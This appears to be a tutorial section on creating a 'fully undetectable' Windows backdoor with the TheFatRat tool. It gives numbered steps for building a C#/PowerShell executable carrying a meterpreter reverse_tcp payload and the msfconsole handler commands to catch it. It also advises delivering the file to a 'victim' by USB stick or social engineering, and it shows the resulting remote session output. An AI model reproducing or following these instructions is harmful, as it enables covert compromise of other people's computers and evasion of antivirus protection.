In this Section, we will be creating a FUD Backdoor using TheFatRat. The FUD Backdoor will be made by creating a EXE File with C# and Powershell Codes. But Don't Worry, you don't have to create the code. You Just Follow the steps given below:
Step 1: Open Terminal and Start TheFatRat Script that we installed in the previous Discussion.
Step 2: Type 6 which will create a FUD Backdoor using PwnWinds.
Step 3: Then, a new menu will open and select thee second option which will create FUD Backdoor using C# + Powershell.
Step 4: Now here open a new terminal and type ifconfig and find your IP Address there (mine is 192.168.1.12), Now go back to our previous terminal and Set LHOST to the IP Address of your device.
Step 5: Set LPORT 4444 or any port number.
Step 6: Enter backdoor file name tstfile
Step 7: Now, you have to select a payload from the given list. Type 3 for using windows/meterpreter/reverse_tcp.
Step 8: Press enter for creating backdoor.
Step 9: After backdoor is created, it will save in /home/user/Downloads/TheFatRat/output/tstfile.exe
Step 10: For accessing backdoor go to above location.
Step 11: Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
After msfconsole has started then type
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > exploit
Now open backdoor in Windows 10. Just copy the exploit file tstfile.exe to the pendrive and then open the pendrive on victims computer. You can also use some social engineering strategy to transfer this exe to the TARGET device.
You need to copy two files, tstfile.exe and program.cs, as this backdoor was built using C #
As soon as the victim, opens the file and a popup will came out and then the meterpreter session will be opened in your kali linux.
As shown below meterpreter session has started in msfconsole in your terminal.
msf5 exploit(multi/handler) > exploit  Started reverse TCP handler on 192.168.1.12:4444  Sending stage (179779 bytes) to 192.168.1.5 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000 meterpreter > sysinfo Computer : DESKTOP-2304ULE OS : Windows 10 (Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
The above target is using Widnows 10. As session has created attacker can perform various tasks, by simply typing help in the meterpreter session.